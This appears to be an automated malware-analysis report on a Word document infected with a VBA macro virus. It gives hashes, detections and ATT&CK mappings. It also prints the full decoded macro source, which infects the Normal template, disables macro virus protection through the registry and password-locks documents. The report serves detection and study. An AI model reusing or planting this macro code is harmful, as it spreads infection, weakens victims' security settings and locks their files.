Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7f1533dca1d9192…

MALICIOUS

Office (OLE)

27.0 KB Created: 2000-11-11 17:28:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 25e751753dade0f4d8ee6cb7addd61cc SHA-1: 2d33aca424c63bcfdee2d672ecb76ab2d693c375 SHA-256: d7f1533dca1d9192d44200821f8640a44efea756bca9adf09a666ebe480b3710
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains VBA macros that are identified as malicious by ClamAV. The macro code attempts to drop a file to 'C:\WalruS.drv' and modify the registry to establish persistence and potentially disguise the infection. The macro also attempts to protect the document and display a large 'The WalruS' text, indicating a lure or a form of ransomware.

Heuristics 2

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1902 bytes
SHA-256: 69e3c9f0b7cb7d7468255651a7087db6e3b7b6bc131b0677064bedf28755637e
Detection
ClamAV: Doc.Trojan.Fool-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function GetTickCount Lib "Kernel32" () As Long
Private Sub Document_Close()
' WalruS Virus 11/00
    On Error Resume Next
    If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub
    DropPath = ("C:\WalruS.drv")
    RunTime = Format(GetTickCount / 60000, "0")
    VBProject.VBComponents(1).Export DropPath
    Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule: Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
    Options.VirusProtection = False: Options.SaveNormalPrompt = False: Application.DisplayStatusBar = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "WalruS"
    If nt.CountOfLines = 0 Then
        nt.AddFromFile DropPath: nt.DeleteLines 1, 4: nt.replaceline 30, " Sub ToolsMacro(): End Sub"
    End If
    If ad.CountOfLines = 0 Then
        ad.AddFromFile DropPath: ad.DeleteLines 1, 4: ad.replaceline 30, " Sub ViewVBCode(): End Sub"
        ActiveDocument.Save
    End If
    If RunTime > 300 Then
        Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
        ActiveDocument.Shapes.AddTextEffect(msoTextEffect29, "The WalruS", _
            "Arial Black", 72#, msoFalse, msoFalse, 73.75, 129.3).Select
        ActiveDocument.Protect Password:=Application.UserName, NoReset:=False, Type:= _
            wdAllowOnlyComments
        ActiveDocument.Save
    End If
    Kill DropPath
End Sub
 Sub ViewVBCode(): End Sub